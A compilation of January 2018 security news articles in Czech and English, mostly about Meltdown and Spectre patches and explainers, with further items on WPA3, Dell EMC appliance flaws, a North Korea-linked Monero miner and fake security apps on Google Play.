Microsoft vydal záplatu a počítače s AMD přestaly startovat. Prý za to nemůže
9.1.2018 Živě.cz
Zranitelnosti
Microsoft sice vydal první várku záplat proti chybám v procesorech Meltdown a Spectre už zkraje roku, nicméně po týdnu je musel zablokovat. Tedy ne všem – jen majitelům počítačů s některými procesory od AMD.

Oprava totiž zalátala chyby v procesorech opravdu dokonale: Po instalaci nelze nastartovat Windows. To je samozřejmě ohromný problém, Microsoft však v oznámení jednoznačně viní AMD.

Dokumentace k procesorům AMD je plná chyb
„After investigating, Microsoft has determined that some AMD chipsets do not conform to the documentation previously provided to Microsoft to develop the Windows operating system mitigations to protect against the chipset vulnerabilities known as Spectre and Meltdown.“

Podle redmondské korporace vycházeli vývojáři z dokumentace výrobce, ta však prý neodpovídá tomu, jak procesor funguje. A tak se oprava sama stala chybou. Microsoft nyní dle svých slov usilovně spolupracuje s AMD, aby problém co nejrychleji vyřešil.

Klepn%C4%9Bte%20pro%20v%C4%9Bt%C5%A1%C3%AD%20obr%C3%A1zek
Microsoft pozastavil aktualizace Windows na počítačích s vybranými procesory od AMD
Neodpovídající dokumentace není ve světě IT nic nového a zejména bastlíři se tu a tam setkají s neodpovídající oficiální dokumentací třeba k nejrůznějším senzorům. Zpravidla se však jedná o levné čínské výrobce. Pokud se takových chyb dopustilo i AMD, je to nesporně ostuda.


Wi-Fi bude opět bezpečné. WPA3 ochrání i otevřené sítě
9.1.2018 CNEWS.cz
Zabezpečení
Wi-Fi jsou dnes nejčastěji chráněny technologií WPA2 starající se o autentizaci a šifrovaní sítí. Sada těchto protokolů ale pochází už roku 2004 a doposud neměla nástupce. Když bylo loni na podzim WPA2 kompromitováno exploitem KRACK, vývoj to rychle posunulo kupředu. Wi-Fi Alliance, sdružení výrobců spravující bezdrátový standard, proto včera představilo WPA3.

Přidává čtyři nové prvky ochrany, které zlepší bezpečnost sítí. Konkrétní detaily ale zatím zveřejněny nebyly.

V otevřených sítích v kavárnách apod. již mezi přístupovým bodem a připojeným zařízením bude probíhat šifrovaná komunikace, kterou nebude možné odposlouchávat. Šéf marketingu WFA Kevin Robinson ale dodává, že nejde o neprůstřelné řešení, jen nezbytné minimum, aby váš proud packetů nemohli snadno zaznamenávat ostatní uživatelé v dosahu.
Přibude účinnější ochrana u sítí zabezpečených slabým heslem. Nebude již možné slovníkovým útokem nebo hrubou silou zkoušet všechny možné kombinace, systém takové typy útoků zablokuje.
Žárovky, chytré vysavače a jiné spotřebiče využívající internet věcí budou rovněž bezpečnější. Aktuálně jsou totiž výrobky bez displeje kvůli jednoduchosti snadno napadnutelné. WPA3 má přinést možnost tato zařízení nastavovat pomocí blízkého mobilu či tabletu.
WPA3 podporuje nové 192bitové šifrování z Commercial National Security Algorithm Suite (CNSA Suite) vyvinutého v americkou vládní organizací. Bez bližších podrobností pouze víme, že půjde o extra stupeň ochrany určený pro citlivé sítě v podnicích nebo úřadech.
Zatím ani nevíme to hlavní, kdy se WPA3 objeví v prvních produktech a zdali půjde technologii dostat aktualizací firmwaru do současných zařízení, nebo bude potřeba vytvořit nová.


Microsoft Suspends CPU Flaw Patches for AMD Devices
9.1.2018 securityweek
Vulnerebility
Microsoft Will Not Deliver Security Updates to Devices With Incompatible Antiviruses

Users whose computers have AMD processors no longer receive the recent Windows updates designed to patch the Meltdown and Spectre vulnerabilities, and Microsoft has warned that some systems may not receive upcoming security updates if the antivirus running on them has not set a specific registry key.

Several individuals whose devices are powered by some AMD processors, particularly older models, complained that they had been unable to boot Windows 10 after installing KB4056892, an update released by Microsoft in response to flaws affecting Intel, AMD and ARM processors.

Many of those affected said their operating system froze during boot. Those who managed to restore their systems by reverting to a previous state needed to quickly disable automatic updates to prevent the patch from being reinstalled.

Some of the impacted users pointed out that since the risk of attacks against AMD CPUs is said to be low, they can wait for proper updates from Microsoft.

Microsoft has confirmed the issue, explaining that “some AMD chipsets do not conform to the documentation previously provided to Microsoft to develop the Windows operating system mitigations to protect against the chipset vulnerabilities known as Spectre and Meltdown.”

The tech giant has decided to temporarily pause Windows updates to devices with impacted AMD processors. For those who have already installed the updates and are experiencing problems, Microsoft has provided some recommendations on how to fix the issue.

Microsoft’s advice for Windows 10 users includes starting the computer in safe mode and uninstalling recent updates, or restoring the system to an earlier point. Several users have complained, however, that they get an error when attempting to restore the system.

In addition to causing problems to Windows, the Spectre and Meltdown updates from Microsoft also break some applications, including the PulseSecure VPN and an Asus utility.

Security updates will not be delivered to devices with incompatible antiviruses

When Microsoft first released the updates designed to prevent Spectre and Meltdown attacks, the company warned that it had identified compatibility issues with some security products. It informed users that if they had not been offered the security updates, it may have been due to the failure of their antivirus to create a specific registry key.

Microsoft later also informed users that they may not receive any future security updates if their antivirus vendor does not address the problem.

Researcher Kevin Beaumont has been keeping track of which security vendors have implemented this requirement. As of Monday, a majority of firms had either released automatic fixes or made available instructions on how to manually create the required registry. The remaining vendors are working on fixes.

Microsoft noted that users who don’t rely on any antivirus will also need to manually create the registry key.

The role of the registry key is to prevent blue screen of death (BSOD) errors triggered due to compatibility issues when security products make unsupported calls to the Windows kernel memory. Microsoft says the requirement for the registry key will remain in place until the company is confident that a majority of consumers will not experience crashes due to the security updates.


Apple released patches to fix Spectre flaws in Safari, macOS, and iOS
9.1.2018 securityaffairs Apple

Apple released iOS 11.2.2 software, a macOS High Sierra 10.13.2 supplemental update, and Safari 11.0.2 to fix Spectre flaws.
On Monday, Apple released patches to fix Spectre flaws in Safari, macOS, and iOS, the tech giant released iOS 11.2.2 software a macOS High Sierra 10.13.2 supplemental update. The patches also fixed vulnerabilities in Apple WebKit, the web browser engine used by Safari, Mail, and App Store.

The security updates issued by Apple aim to mitigate the two known methods for exploiting Spectre identified as “bounds check bypass” (CVE-2017-5753/Spectre/v1) and “branch target injection” (CVE-2017-5715/Spectre/v2).

Just after the disclosure of the Meltdown and Spectre attacks, Apple released security updates (iOS 11.2, macOS and tvOS 11.2) to protect its systems against Meltdown attacks.

Apple now released the following security updates:

macOS High Sierra 10.13.2 supplemental;
Safari 11.0.2 that is available for OS X El Capitan 10.11.6 and macOS Sierra 10.12.6;
iOS 11.2.2 available for iPhone 5s and later, iPad Air and later, and iPod touch 6th generation;
After the disclosure of the flaws, security experts pointed out that the Spectre vulnerability is very hard to patch, but fortunately, the exploitation is much more difficult than Meltdown.

Another worrisome aspect of the Spectre attacks is that it breaks the isolation between different applications opening the door to remote attacks, for example, an attacker can remotely bypass sandboxing mechanism implemented by modern browsers.


PŘEHLEDNĚ: Meltdown a Spectre změní procesory , jak ale útoky fungují?

9.1.2018 SecurityWorld Hardware
Bezpečnostní hrozba týkající se velké části v současnosti užívaných procesorů už pár dní hýbe technologickými médii. Týká se nejen stolních počítačů, ale také laptopů, chytrých telefonů, tabletů a dalších zařízení. Zranitelnosti se dělí na dva typy – Spectre a Meltdown.

Oba typy přibližuje společnost Red Hat a její ARM vývojář Jon Masters, který na odhalení a opravě zranitelností osobně pracoval.

Spectre i Meltdown fungují na principu zneužívání tzv. spekulativního vykonávání, standardního jevu u fungování procesorů. Připodobněme si jej k lépe uchopitelné situaci z reálného světa.

Zákazník pravidelně navštěvuje oblíbenou kavárnu a objednává si stále tu samou kávu; obsluha si postupem času „zvykne“ na toto pravidelné chování a začne mu kávu připravovat předem. Jednoho dne však zákazník svou objednávku změní a obsluha musí uvařit kávu jinou a novou.

Teď si k tomu přidejme prvek, že na zákazníkově kelímku, do kterého mu obsluha kávu připravuje, je napsáno jeho jméno. Když mu spekulativně připravují jeho kávu, ale zákazník si tentokrát objedná něco jiného, musí popsaný kelímek s kávou vyhodit; v tu chvíli je však informace na kelímku viditelná pro kohokoliv, kdo by jej potenciálně sledoval.

Jde o příklad spekulativního vykonávání: obsluha neví jistě, zda si zákazník objedná to, co obvykle, ale soudě podle předchozích zkušeností učiní kvalifikovaný odhad. Podobně spekulace se během našeho dne dějí běžně, protože jsou efektivní a často pravdivé. Téměř stejně fungují i naše počítače: spekulativní vykonávání umožňuje uskutečnit některé operace a procesy ještě předtím, než je zcela jasně známo, že budou potřeba. Jde o časovou úsporu.

Moderní procesory spekulativní vykonávání využívají často a jejich algoritmy se neustále zdokonalují; často dosahují až 99% přesnosti ve svých odhadech.

Potenciální zrychlení využitím spekulativního vykonávání je značné: čipy dokáží poměrně spolehlivě předpovídat, zda nastane možnost A, nebo zda budou muset vykonat jinou činnost a tím zvyšují rychlost procesů. Jde o jednu z klíčových optimalizací posledních několika dekád.

A tím se dostáváme ke zdroji zranitelností Spectre a Meltdown: pokusy o další optimalizaci spekulativního vykonávání způsobily problémy, protože vývojáři předpokládali, že celý proces je „černá skříňka“, neviditelná pro třetí stranu, a tedy i útočníky.

To se však ukázalo jako nepravda a útočníci mohou do „spekulativního okna“ proniknout a systémem následně do jisté míry manipulovat. Masters z Red Hat očekává, spolu s dalšími odborníky, že objevené zranitelnosti snadno mohou zapříčinit proměnu procesu výroby čipů do budoucna.

Meltdown je zranitelnost, při které útočník zneužívá spekulativního okna tak, aby mohl na data, která jím prošla, nahlédnout. Útok spoléhá na běžně užívané principy, standardní pro celý průmysl. Problémem je paralelní kontrola povolení k přístupu a načítání dat z mezipaměti, která není nijak řešena, neboť, jak je psáno výše, nikdo neočekával, že by na proces spekulativního vykonávání mohl někdo „nahlížet“.

Meltdown jde výrazně omezit už nyní, problém je ovšem z toho plynoucí zpomalení systému.

Spectre je o něco složitější druh zranitelnosti, princip jeho zneužití je však obdobný: útočník může z cache čerpat citlivá data. Velice náročnou záležitostí bude Spectre omezit natolik, aby již pro uživatele nemohl být hrozbou; dopad na výkon zařízení je totiž ještě výraznější; Red Hat mluví o zpomalení, které „není nevýznamné“.

Masters zdůrazňuje, že jde o zcela nové kategorie systémových zranitelností: není jasné, jak se v následujících měsících situace vyvine.


Intel: většina novějších čipů s chybami Meltdown a Spectre dostane opravu do týdne
9.1.2018 Lupa.cz
Hardware
Šéf firmy Intel Brian Krzanich na veletrhu CES v Las Vegas znovu ujišťoval, že jeho firma i další výrobci procesorů dělají všechno pro to, aby opravili nedávno zveřejněné chyby v zabezpečení svých čipů. Zranitelnosti známé pod jmény Meltdown a Spectre teoreticky umožňují útočníkům přistupovat k datům v paměti počítače či mobilního zařízení.

Podle Krzaniche Intel nemá žádné informace o tom, že by chyby někdo už v praxi zneužil. To samo o sobě samozřejmě není informace, která by mohla uživatele uklidnit. Důležitější je, že Intel by měl do týdne vydat opravné balíčky pro své procesory, které by měly chyby opravit u asi 90 % čipů vyrobených v posledních pěti letech. Zbytek novějších čipů se má opravy dočkat do konce ledna, prohlásil šéf Intelu.

Kdy (a zda vůbec) se opravy dočkají i starší procesory, zatím není jasné. Krzanich mluvil i o možných dopadech patchů na výkon procesorů. Zopakoval stanovisko Intelu, že jsou závislé na druhu jejich vytížení a Intel se do budoucna bude snažit propady ve výkonu co nejvíce omezit.

Své první opravy postupně vydávají také výrobci operačních systémů. Apple v pondělí vydal iOS 11.2.2, který obsahuje opravy pro prohlížeč Safari a jeho renderovací jádro WebKit. Svůj patch pro Windows uvolnil i Microsoft a někteří uživatelé s procesory AMD podle serveru Computerworld hlásí, že po jeho instalaci mají problémy s nastartováním systému.


V čem spočívají Meltdown a Spectre? Zneužívají optimalizací procesorů
9.1.2018 Root.cz
Hardware
O útocích Meltdown a Spectre hovoří snad všechna světová média. Jedná se vlastně o celý nový princip postihující moderní procesory. V čem ale přesně spočívají a jak je možné je zneužít? Existují dostatečně účinné záplaty?

Volně přeloženo z textu What are Meltdown and Spectre? Here’s what you need to know, jehož autorem je Jon Masters ze společnosti Red Hat. Vydáno se svolením autora.

Všechna média mluví o nově objevených bezpečnostních hrozbách, které zahrnují i napadení vlastností moderních procesorů, které pohánějí naše počítače, tablety, telefony a další přístroje. Tyto útoky se nazývají „Meltdown“ a „Spectre“ a přitahují hodně pozornosti. Lidé se (oprávněně) obávají a je samozřejmě velmi důležité aplikovat všechny dostupné softwarové záplaty, které byly pečlivě vytvořeny a zveřejněny. Přední technologické firmy, včetně Red Hatu, pracují společně na tom, aby minimalizovaly potenciální riziko útoku.

V Red Hatu jsme pracovali na zmírnění dopadů případných útoků pod standardním bezpečnostním embargem, takže jsme cíleně vytvářeli malé týmy vybavené minimálními nutnými informacemi, abychom byli připraveni ještě před veřejným odhalením celého problému. Měl jsem to štěstí, že jsem mohl být mezi těmi, kteří vedli naše snahy o řešení problémů Meltdown a Spectre, které jsou také známé jako varianty 1, 2 a 3 celé rodiny útoků, kterou Google Project Zero zveřejnil 3. ledna. V rámci našich snah jsme ve svých laboratořích reprodukovali Meltdown (variantu 3) a prozkoumali další varianty. Mezi tím jsme spolupracovali s našimi hardwarovými partnery na řešeních.

Rozumíme velmi dobře těmto chybám a máme k dispozici nejnovější analýzy i záplaty zmírňující potenciální dopad. Pokračujeme ve spolupráci s našimi partnery, zákazníky a výzkumníky při řešení této situace. Zároveň bychom rádi ostatním pomohli v pochopení těchto komplexních potíží, ideálně tak, abychom použili jazyk a pojmy, které po čtenáři nevyžadují, aby rozuměl problematice tvorby počítačových procesorů.

Pokud vás zajímají technické detaily, původní studie a související publikace jsou dostupné na webech meltdownattack.com a spectreattack.com. Mějte ale na paměti, že většina z jejich tvůrců jsou lidé s akademickým vzděláním týkajícím se architektur počítačů. Minimálně jeden z nich má v této oblasti titul Ph.D. Nebuďte tedy nešťastní z toho, že vám bude trvat dlouho, než proniknete do všech technických detailů – je to velmi komplexní a složitá problematika.

Spekulativní provádění instrukcí
Abychom mohli pokračovat, musíme pochopit něco o spekulativním provádění instrukcí. Použijeme k tomu každodenní analogii.

Představte si běžného zákazníka, který navštěvuje denně stejnou kavárnu a objednává si každé ráno stejný nápoj. V průběhu času si jej baristé zapamatují a budou znát jeho obvyklou objednávku. Protože chtějí nabídnout špičkové služby (a případně ušetřit svému zákazníkovi čas ve frontě), mohou se baristé rozhodnout, že začnou připravovat obvyklý nápoj, jakmile zákazníka uvidí vejít do dveří a zamávat na pozdrav. Jednoho dne ale zákazník změní svou objednávku. V takovou chvíli musí barista vylít v předstihu připravenou kávu a udělat novou podle zákazníkova přání.

Pojďme ještě o krok dále a představme si, že barista zná zákazníkovo jméno. Když v předstihu připraví obvyklý nápoj, rovnou fixou na kelímek jméno napíše. Pokud se zákazník výjimečně rozhodně pro změnu, celý kelímek i se jménem je vyhozen do koše. V tu chvíli je ale jméno i obsah viditelný pro kohokoliv, kdo se právě dívá.

Scénář s kavárnou zavádí spekulaci. Zaměstnanci neví jistě, zda si daný zákazník chce dát latte nebo Americano. Z historických dat ale ví, co si daný zákazník obvykle dává a mohou tak učinit kvalifikovaný odhad, aby zkrátili čas vyřízení objednávky. Podobné spekulativní odhady používáme každý den, protože se obvykle ukáží být správné a ve výsledku tak za stejný čas stihneme udělat víc.

Stejné je to s našimi počítači. Ty používají techniku zvanou „spekulativní provádění instrukcí“, aby provedly některé operace ještě dříve, než bude jisté, že budou potřeba. Předpokládá se přitom, že vše je založené na správných odhadech, které obvykle ušetří čas.

Koukáme pod ruce procesoru
V případě počítačů se toto spekulativní provádění používá k rozhodování při testech jako „pokud A, udělej toto; jinak udělej tohle“. Říkáme tomu testování podmínek a výsledkem je provádění kódu, kterému říkáme podmíněné větvení. Větev označuje část programu, kterou jsme se rozhodli provádět na základě výsledku rozhodování. Moderní procesory disponují sofistikovanými algoritmy schopnými toto větvení předvídat. Jsou tak schopné určit, jaký bude pravděpodobně výsledek rozhodovacího testu, ještě před tím, než bude skutečně proveden. V mezidobí pak spekulativně provedou kód ve větvi, kterou se bude pravděpodobně nutné za chvíli vydat. Pokud se odhad ukáže být správným, procesor zdánlivě poběží rychleji, než kdyby doopravdy čekal na dokončení testu. Pokud byl odhad špatný, procesor zahodí zpracované výsledky a běžným způsobem začne provádět kód v jiné větvi.

Algoritmy pro předvídání jsou obvykle úspěšné v 99 % případů, takže potenciální výkonnostní dopad spekulativního vykonávání kódu je významný. Ve skutečnosti jde jen o jednu z mnoha optimalizačních technik, které pomáhaly dramaticky zvyšovat výkon počítačů v posledních několika desetiletích. Pokud se správně implementuje, je zvýšení výkonu značné. Zdrojem nově objevených problémů je předpoklad, že spekulativní proces je černá skříň, do které nevidí vnější pozorovatel.

Celé odvětví se domnívalo, že cokoliv se děje během celé spekulace (proces se nazývá „okno spekulativního provádění“) je později buď potvrzeno nebo je to popřeno a bezpečně zahozeno. Ukázalo se ale, že existují způsoby, jakými mohou útočníci sledovat, co se během procesu dělo a na základě toho pak mohou se systémem manipulovat. Útočník může dokonce řídit chování předvídacích algoritmů tak, aby způsobil spekulativní spuštění těch částí kódu, které by procesor jinak nikdy neprováděl. Očekáváme, že tyto a další podobné chyby ovlivní to, jak budou procesory navrhovány v budoucnu – abychom mohli používat spekulativní provádění bez rizik.

Meltdown
Pojďme se na popsané útoky podívat podrobněji, začneme s Meltdown (varianta 3). Ten na sebe strhává více pozornosti, protože má širší dopady. Při provádění tohoto útoku je čip manipulován tak, že načte citlivá data během spekulativního okna, aby je později útočník mohl prozkoumat. Celé to stojí na běžné praxi, že je načítání dat z paměti odděleno od procesu kontroly oprávnění. Všichni doposud věřili, že je celý proces neviditelný, takže to vlastně nikomu nevadilo.

Během útoku Meltdown je pečlivě sestaven útočný kód, který bude spuštěn během spekulativního procesu. Tento kód načítá citlivá data, ke kterým za normálních okolností nemá proces přístup. Protože se ale vše provádí spekulativně, zároveň probíhá kontrola oprávnění, která není ukončena před doběhnutím daného spekulativního okna. V důsledku se do cache procesoru nahrají chráněná data. Poté se spustí druhá pečlivě připravená sekvence, která provede jinou operaci na základě získaných citlivých dat. Za normálních okolností by výsledky tohoto běhu nebyly nikdy vidět, protože by byly potichu zahozeny. Útočník ale může využít techniku známou jako analýza cache postranním kanálem a může z dočasné paměti vyčíst uložená data.

Odstranění této chyby vyžaduje změnu ve správě paměti mezi aplikacemi a operačním systémem. Představili jsme novou technologii nazvanou KPTI, která odděluje paměť tak, že bezpečná data nemohou být načtena do interní cache, pokud běží uživatelem spuštěný kód. Vyžaduje to ale další kroky, které jsou prováděny vždy, když aplikace požádá o některou akci operačního systému (tomu říkáme „systémová volání“). Tím ale přicházíme o část výkonu, jejíž velikost je dána tím, jak často daný proces volá služby operačního systému.

Spectre
Útok Spectre má dvě části. První (varianta 1) porušuje kontrolu omezení. Opět, když se spekulativně provádí kód, čip může načíst nějaká data, která jsou pak použita k lokalizaci jiných dat. V rámci výkonnostních optimalizací se ale může procesor rozhodnout načíst rovnou druhou část dat, aniž by ověřil, že první část je v definovaném rozsahu hodnot. Pokud k tomu dojde, je možné sestavit kód tak, aby byl spekulativně vykonán a načetl citlivá data do cache procesoru. Odtud mohou být získána opět pomocí útoku postranním kanálem, jak bylo zmíněno dříve.

Abychom tento problém odstranili, musíme přidat okolo celého jádra něco, čemu říkáme „načítací oplocení“ (load fences). To zabrání spekulativnímu hardware, aby provedl druhé načtení založené na tom prvním. Vyžaduje to malé, triviální a ne příliš výkonově náročné změny ve zdrojovém kódu jádra. Náš tým vytvořil nové nástroje, které pomáhají odhalit místa, kam by tento plot měl být umístěn.

Druhá část útoku Spectre (varianta 2) je v mnoha ohledech tou nejzajímavější. Pracuje s trénováním předvídacího hardware, který pak při spekulativním provádění upřednostní jiný kód než je obvyklé. Běžnou hardwarovou optimalizací je založit rozhodování o daném větvení programu na základě adresy kódu dané větve v paměti. Bohužel způsob uložení této adresy není mezi aplikacemi a jádrem operačního systému unikátní. To umožňuje natrénovat algoritmus tak, aby spustil libovolný kód, který si bude útočník přát. Vhodným zvolením existujícího jaderného kódu, který má přístup k citlivým datům, může útočník tato data načíst do cache a poté pomocí známého útoku postranním kanálem tato data získat.

Jedním z největších strašáků tohoto útoku je možnost obejít hranice mezi jádrem operačního systému a hypervizorem nebo mezi různými virtuálními stroji běžícími na společném hardware. Algoritmy je totiž možné natrénovat tak, že je spekulativně spuštěn privilegovaný kód hypervizoru (nebo jiného virtuálního stroje), který načte data a útočníkovi je zpřístupní. To vytváří vážné riziko pro privátní i veřejná cloudová prostředí běžící na nezáplatovaných serverech.

Oprava druhé části Spectre vyžaduje, aby operační systém selektivně vypínal hardware pro předvídání, kdykoliv nějaký program zavolá operační systém (systémové volání) nebo hypervizor. V takové situaci nebude žádný pokus o trénování algoritmů předán do jádra, hypervizoru nebo mezi jednotlivými virtuály na stejném serveru. Toto opatření funguje dobře, ale přináší výkonnostní postih, který není zanedbatelný. Naše záplaty ve výchozím stavu tuto změnu implementují, ale dávají správcům možnost ji vypnout. Zároveň pracujeme s linuxovou komunitou na tom, abychom dopad snížili a našli alternativu k vypnutí předvídacích funkcí. Jedna z možností je známá jako „retpoline“ a jde o speciálně sestavený kód jádra, který brání nesprávnému spekulativnímu běhu.

Nepanikařte, řešení existuje
Doufám, že vám tento článek dal nahlédnout do hlubin těchto velmi sofistikovaných útoků. Jejich zneužití není triviální, záplatování je možné a přestože jsou už dostupné některé příklady používající Meltdown (varianta 3), velcí výrobci už začali distribuovat záplaty. V průběhu času mohou být objeveny další související zranitelnosti a mohou se objevit příklady jejich zneužití. Je proto důležité sledovat bezpečnostní záplaty a aplikovat je, jakmile budou dostupné.

Je důležité mít na paměti, že tento nový druh bezpečnostních chyb byl objeven teprve před několika dny. Takže se v průběhu času mohou měnit doporučené postupy i způsoby řešení těchto problémů. Budeme i nadále spolupracovat s velkými společnostmi i open-source komunitou, abychom ochránili své zákazníky před těmito a dalšími známými zranitelnostmi a učinili Linux ještě robustnějším vůči útokům typu Meltdown a Spectre. V následujících měsících zveřejníme další informace o této činnosti. Pro více informací navštivte access.redhat.com.


Podsvětí táhne kurzy kybernetických měn nahoru

9.1.2018 Novinky/Bezpečnost Kriminalita
Transakce prováděné pomocí kybernetických měn jsou prakticky nevystopovatelné. Právě proto si je velmi oblíbilo kybernetické podsvětí, jsou prakticky jediným platidlem na nejrůznějších internetových černých trzích. Od bitcoinu však dává podsvětí stále častěji ruce pryč, což nahrává kurzům dalších měn – ty díky stoupající popularitě raketově rostou.
Bitcoin byl ještě před pár měsíci prakticky jediným platidlem na černém trhu. Daly se za něj koupit zbraně, drogy a celá řada dalších nelegálních věcí.

Mimochodem právě podsvětí má nemalý vliv na tom, že popularita bitcoinu tak raketově rostla. Jednoduše jej používalo stále více lidí, díky čemuž i raketově rostl kurz, což následně přilákalo investory a další spekulanty.

Ale právě stále rostoucí popularita bitcoinu nehrála obchodníkům na černém trhu do karet. Kupující se kvůli rostoucím kurzům nechtěli svých mincí vzdávat a stále častěji si je nechávali jako investici. A obchody začaly stát.

Proto se začalo obchodovat s jinými virtuálními mincemi.

Monero či ethereum
Toho si všimli už i pracovníci evropské policejní organizace Europol. Ti upozornili již před koncem loňského roku na to, že obchodníci na černém trhu stále častěji využívají další kryptoměny – například monero či ethereum.

A rostoucí popularita zmiňovaných virtuálních mincí je znát i na jejich kurzech. Ještě před koncem loňského roku se monero obchodovalo za 100 dolarů (2130 Kč). Aktuálně má však jedna mince cenu už okolo 450 dolarů, tedy v přepočtu téměř 9600 Kč.

Růst ceny je patrný také u etherea. V prosinci se jedna mince obchodovala za 450 USD (9600 Kč), aktuálně je to však již 1140 USD (24 300 Kč).


Apple Adds Spectre Protections to Safari, WebKit
9.1.2018 securityweek
Vulnerebility
Updates released by Apple on Monday for iOS, macOS and Safari should mitigate the effects of the vulnerabilities exploited by the recently disclosed attack method named Spectre.

Apple informed customers that iOS 11.2.2 and macOS High Sierra 10.13.2 Supplemental Update include security improvements for Safari and WebKit. The Safari improvements are also included in version 11.0.2 of Apple’s web browser.

The latest updates address the Spectre vulnerabilities, specifically CVE-2017-5753 and CVE-2017-5715. Mitigations for the Meltdown attack were rolled out by Apple, before the flaws were disclosed, with the release of iOS 11.2, macOS 10.13.2 and tvOS 11.2. Apple Watch is not vulnerable to either of the attack methods.

Apple’s analysis showed that the Spectre vulnerabilities “are extremely difficult to exploit,” even by a local app running on iOS or macOS, but the company warned that remote exploitation via JavaScript running in the browser is possible.

“Our current testing indicates that the upcoming Safari mitigations will have no measurable impact on the Speedometer and ARES-6 tests and an impact of less than 2.5% on the JetStream benchmark,” Apple said last week.

Apple believes the Meltdown technique, which relies on a vulnerability tracked as CVE-2017-5754, has the most potential for exploitation.

Meltdown and Spectre can be used by malicious actors to bypass memory isolation mechanisms and access passwords, photos, documents, emails, and other sensitive information.

The attacks work against devices with Intel, AMD and ARM processors. Intel has been hit the hardest, while AMD claims the risk of attacks is low and ARM found that only ten of its CPUs are impacted.

Patches and workarounds have already been released by several major vendors, but they can introduce significant performance penalties, and Microsoft’s updates may also break Windows and various apps.


Dell EMC fixes 3 zero-day vulnerabilities in Data Protection Appliance products
9.1.2018 securityaffairs
Vulnerebility

Dell EMC informed its customers that its Avamar Server, NetWorker Virtual Edition and Integrated Data Protection Appliance products are affected by 3 zero-day flaws.
Dell EMC informed its customers that its Avamar Server, NetWorker Virtual Edition and Integrated Data Protection Appliance products are affected by vulnerabilities that can be chained by an attacker to take complete control of a target system.

The flaws reside in the Avamar Installation Manager (AVI) component that is present in all the products.

The vulnerabilities were discovered by the experts at the consultancy firm Digital Defense Inc, the three issues included:

An Authentication Bypass in SecurityService; an
Authenticated Arbitrary File Access in UserInputService; and an
Authenticated File Upload in UserInputService.
Dell published a security advisory is ESA-2018-001, that could be accessible by customers having Dell EMC Online Support credentials.

Dell EMC Data Protection Appliance

The most severe issue tracked as CVE-2017-15548 could be exploited by a remote attacker to bypass authentication and gain root access to the system.

The flaw is related to the authentication process that is implemented via a POST request including the username, password and a parameter named wsUrl.

“User authentication is performed via a POST that includes username, password and wsURL parameters. The wsURL parameter can be an arbitrary URL that the Avamar server will send an authentication SOAP request to, that includes the user provided username and password,” reads the analysis published by Digital Defense. “If the Avamar server receives a successful SOAP response, it will return a valid session ID. The attacker doesn’t require any specific knowledge about the targeted Avamar server to generate the successful SOAP response, a generic, validly formed SOAP response will work for multiple Avamar servers.”

The second flaw, tracked as CVE-2017-15549, could be exploited by an authenticated attacker with low privileges to upload malicious files to the server.

“Authenticated users can upload arbitrary files to arbitrary locations with root privileges. This can be combined with the other two vulnerabilities to fully compromise the virtual appliance.” continues the analysis.

“The saveFileContents method of the UserInputService class takes a single string parameter and splits it on the ‘\r’ character. The first half of the parameter is a path, including the filename, and the second half of the string is the data that should be written to that path. The web server is running with root privileges, so arbitrary files can be written to arbitrary locations.”

The third vulnerability tracked as CVE-2017-15550 is a path traversal issue that allows an authenticated attacker with low privileges to access arbitrary files on the server.

“Authenticated users can download arbitrary files with root privileges. This can be combined with the other two vulnerabilities to fully compromise the virtual appliance.” states the analysis.

“The getFileContents method of the UserInputService class doesn’t perform any validation of the user supplied filename parameter before retrieving the requested file from the Avamar server. Additionally, the web server runs as root, so any file can be retrieved using this vulnerability.”

By chaining the three vulnerabilities a remote attacker could take complete control of a vulnerable system.

Affected products are:

Avamar Server 7.1.x, 7.2.x, 7.3.x, 7.4. x, 7.5.0
NetWorker Virtual Edition 0.x, 9.1.x, 9.2.x
Integrated Data Protection Appliance 2.0
EMC has released security fixes that address all the flaws.


Experts spotted Monero cryptominer sending currency to North Korean University
9.1.2018 securityaffairs Hacking

Security researchers at AlienVault labs recently analyzed an application compiled on Christmas Eve 2017 that is an installer for a Monero cryptocurrency miner.
The mined Monero coins are sent to Kim Il Sung University in Pyongyang, North Korea, but experts noted that the developers might not be of North Korean origins.

The KSU is an unusually open University, it is attended by a number of foreign students and lecturers.

The researchers speculate the application could either be an experimental software or could be a prank to trick security researchers by connecting to Kim Il Sung University in Pyongyang, North Korea.

Monero miner North Korea

Once executed, it copies a file named intelservice.exe to the system, this is the Monero cryptocurrency mining malware.

“The filename intelservice.exe is often associated with crypto-currency mining malware. Based on the arguments it’s executed with, it’s likely a piece of software called xmrig.” reads the analysis published by AlienVault.

“It’s not unusual to see xmrig in malware campaigns. It was recently used in some wide campaignsexploiting unpatched IIS servers to mine Monero.”

The experts determined that it is a piece of software called xmrig by observing the arguments the file is executed with.

Analyzing the file the researchers discovered both the address of the Monero wallet and the password used that is “KJU”, a possible reference to Kim Jong-un.

The mined currency is sent to the server barjuok.ryongnamsan.edu.kp server located at Kim Il Sung University.

The address barjuok.ryongnamsan.edu.kp address doesn’t currently resolve, either because the app was designed to run on the university’s network, or because it was no longer in use.

“It’s not clear if we’re looking at an early test of an attack, or part of a ‘legitimate’ mining operation where the owners of the hardware are aware of the mining.” continues the analysis.

“On the one hand the sample contains obvious messages printed for debugging that an attacker would avoid. But it also contains fake filenames that appear to be an attempt to avoid detection of the installed mining software.”

Security experts pointed out that North Korea-linked group Lazarus was already involved in attacks involving cryptocurrencies.

In December, security experts from Secureworks revealed the Lazarus APT group launched a spearphishing campaign against a London cryptocurrency company.

The attacks focused on Monero conducted by North Korean threat actors were associated with Bluenorroff and Andariel hackers, who are considered as being part of the Lazarus group. Researchers from AlienVault highlighted that they haven’t discovered evidence to link the newly found Installer to any attacks attributed to Lazarus.

“We have not identified anything linking our Installer to these attacks. The Lazarus attackers have capable developers, and craft their own malware from a library of low-level code.” concluded the research. “Given the amateur usage of Visual Basic programming in the Installer we analysed, it’s unlikely the author is part of Lazarus. As the mining server is located in a university, we may be looking at a university project.”

Experts also made another hypothesis, someone inside the University developed the project to test the use of cryptocurrency in a country hit hard by sanctions.


Trend Micro spotted 36 malicious apps advertised as security tools spotted in Google Play
8.1.2018 securityaffairs Android

Researchers from Trend Micro have discovered 36 malicious apps on Google Play that are posing as security tools of major firms.
Once again crooks bypassed security checks implemented by Google, researchers from Trend Micro have discovered 36 malicious apps on Google Play that are posing as security tools.

Crooks advertised the apps as security tools as applications developed by major security firms, including Security Defender, Security Keeper, Smart Security, Advanced Boost.

The applications were developed to steal user information and flood them with ads.

